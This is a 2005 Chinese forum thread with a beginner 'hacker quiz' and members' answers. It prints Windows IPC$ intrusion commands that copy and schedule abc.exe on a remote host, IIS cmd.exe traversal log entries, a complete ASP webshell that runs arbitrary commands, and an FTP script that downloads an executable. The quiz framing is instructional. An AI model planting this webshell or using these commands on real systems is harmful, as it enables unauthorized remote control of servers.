BYsan

 找回密碼
 成為會員
搜索
熱搜: 活動 交友 discuz
查看: 1266|回復: 3

黑客驗卷

[複製鏈接]
發表於 2005-5-26 19:45:02 | 顯示全部樓層 |閱讀模式
一份黑客菜鳥試卷,歡迎各位朋友作答,有獎賞哦,快點加油哦﹗


一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三個連接指向同一目標網站,那么它們分別是什麼意義?

二、
常用端口識別
20 21 23
25 80 110
139 443 445

三、
試述下列命令作用
c:>net use 211.87.194.121ipc$ “123456”/user:”administrator”
c:>net use z: 211.87.194.121c$
c:>net time 211.87.194.121
c:>copy abc.exe 211.87.194.121admin$system32

四、
試述下列命令的區別,如何防止該命令在本地或遠程營運
c:>at 211.87.194.121 21:05 abc.exe
c:>at 21:05 211.87.194.121admin$system32abc.exe

五、
W3SVC日誌是什麼?分析下面這段日誌。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情給分。

六、
netstat命令有何作用,舉出兩個參數進行說明。

七、
試述木馬的一些基本特徵。

八、
如何利用腳本實現對ftp的自動操作?

九、
下面是一個ASP木馬,請找出支持這一程式的關鍵點。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞,並對腳本有執行權限,如何進行入侵?(只要求敘述到如何上傳文件,其他思路會酌情給分)
那么,如何在不打補丁的情況下避免這種攻擊的發生?

十一、OSI模型中哪一層上有協議?分別是什麼?

十二、觀察ping命令的返回包的TTL值,可以了解到什麼?

十三、從通訊閘得到采樣
目標 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目標 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目標 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
請問 這可能是什麼樣的會話,採用什麼協議,進行什麼樣的作業?

十四、談談你對hacker和網路安全的認識
發表於 2005-6-17 18:25:49 | 顯示全部樓層
  我5係咁識黑客d野~~獻醜同請指教


  1. 一、
  2. [url]http://192.168.0.1[/url]
  3. [url]http://xyz.3322.org[/url]
  4. [url]http://3232235521[/url]
複製代碼

  有毒網???

  1. [url]http://192.168.0.1[/url]
複製代碼
  ip??


  1. c:>net use 211.87.194.121ipc$ “123456”/user:”administrator”
複製代碼
  解決忘記windows使用者密碼??

  1.  六、
  2. netstat命令有何作用,舉出兩個參數進行說明。
複製代碼
 

  知道自己ip同咩軟體連緊

  1. 十四、談談你對網路安全的認識
複製代碼

     不明來歷網站,mail不要開,同不要收取/打開不明來歷的附件
 樓主| 發表於 2005-6-17 21:12:47 | 顯示全部樓層
$靚仔龍$呵呵  在 2005-6-17 06:25 PM 發表:

  我5係咁識黑客d野~~獻醜同請指教


  1. 一、
  2. [url]http://192.168.0.1[/url]
  3. [url]http://xyz.3322.org[/url]
  4. [url]http://3232235521[/url]
複製代碼

  有毒網???
[code]
[url]http://192 ...


除十四外 全部錯曬
 樓主| 發表於 2005-6-17 21:20:30 | 顯示全部樓層
一、

一&#20010;是IP 一&#20010;是域名
第三&#20010;是十&#36827;制的
二、
常用端口&#35782;&#21035;
20        文件&#20256;&#36755;&#21327;&#35758;
21        文件&#20256;&#36755;&#21327;&#35758;,也就是FTP
23        telnet &#32456;端仿真&#21327;&#35758;
25        smtp &#31616;&#21333;&#37038;件&#21457;送&#21327;&#35758;
80        全球信息网超文本&#20256;&#36755;&#21327;&#35758;
110       Pop3 服&#21153;器
139       win98 共享&#36164;源端口
443       安全服&#21153;
445       不知道是什么&#19996;西(不好意思)
三、
&#35797;述下列命令作用
c:>net use 211.87.194.121ipc$ “123456”/user:”administrator”
用&#25143;admininistrator密&#30721;123456登&#24405;211.87.194.121 ipc$ 口子
c:>net use z: 211.87.194.121c$
把211.87.194.121 主机的C&#30424;映到本地Z&#30424;
c:>net time 211.87.194.121
看&#23545;方主机的系&#32479;&#26102;&#38388;
c:>copy abc.exe 211.87.194.121admin$system32
把本地&#24403;前目&#24405;的abc.exe复制到&#23545;方WINNTsystem32下
四、
&#35797;述下列命令的&#21306;&#21035;,如何防止&#35813;命令在本地或&#36828;程&#36816;行
c:>at 211.87.194.121 21:05 abc.exe
是在&#23545;方系&#32479;&#26102;&#38388;下的
c:>at 21:05 211.87.194.121admin$system32abc.exe
是在本地&#26102;&#38388;下
禁用WEBSHELL可以吧
五、
W3SVC日志是什么?分析下面&#36825;段日志。
好象是有人在2002-11-24 11:38:54&#36816;行了cmd,并用看了C&#30424;
六、
netstat命令有何作用,&#20030;出&#20004;&#20010;&#21442;&#25968;&#36827;行&#35828;明。
如C:>netstat/?
可以得到&#24110;助。因&#20026;&#26174;示的太多了,我就不打出&#26469;了,就&#35828;&#20004;&#20010;了
-a Displays all connections and listening ports.
-e Displays Ethe
et statistics. This may be combined with the -s
option.

七、
&#35797;述木&#39532;的一些基本特征。
1.具有&#38544;蔽性
2.括极&#24378;的破坏性
3.自身保&#25252;性
4.&#24378;大的&#36828;程控制功能
5.兼容性&#24378;
6.有客&#25143;端和服&#21153;端
7.客&#25143;端&#23545;服&#21153;端有&#26435;限
8.自&#21160;&#36816;行
9.&#36824;有吧,我不知道了

八、

C:>echo open 211.87.216.131 >c:ftp.txe
C:>echo user:user@211.87.216.131 >>c:ftp.txt
C:>echo get abc.exe >>c:ftp.txt
C:>echo bye >>c:ftp.txt
C:>ftp –s:c:ftp.txt
可以吧?
九、
下面是一&#20010;ASP木&#39532;,&#35831;找出支持&#36825;一程序的&#20851;&#38190;&#28857;。
是&#36825;&#20010;吧Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
十存在IIS或CGI漏洞,并&#23545;&#33050;本有&#25191;行&#26435;限,如何&#36827;行入侵?(只要求&#21465;述到如何上&#20256;文件,其他思路&#20250;酌情&#32473;分)

不太&#20250;,我只&#20250;ASP和ASP+PHP
十一
&#35848;&#35848;你&#23545;hacker和网&#32476;安全的&#35748;&#35782;
HACKER,中文是黑客,我听&#36807;一句&#35805;“想真正成&#20026;黑客,你必&#39035;真&#26538;&#23454;&#24377;去做黑客&#24212;&#35813;做的事情。”所以不是&#19987;&#38376;搞破坏的,而是&#23545;网&#32476;安全清楚的一种人,不侵入或破坏主机;不&#24694;意破坏任何系&#32479;;不破化&#21035;人的&#36719;件或&#36164;料,我也很同意&#21035;人&#35828;一切信息都&#24212;&#35813;是免&#36153;的,我就是因&#20026;&#36825;&#20010;&#21160;机,才&#23398;的,我&#20250;&#20005;格遵守守&#21017;,另外中&#22269;的法律在健全,&#35831;不要&#38543;意做破坏网&#32476;的事,也希望大家一&#26679;,&#35874;&#35874;
您需要登錄後才可以回帖 登錄 | 成為會員

本版積分規則

小黑屋|手機版|Archiver|BYsan

GMT+8, 2024-12-13 06:31 PM , Processed in 0.040447 second(s), 15 queries .

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回復 返回頂部 返回列表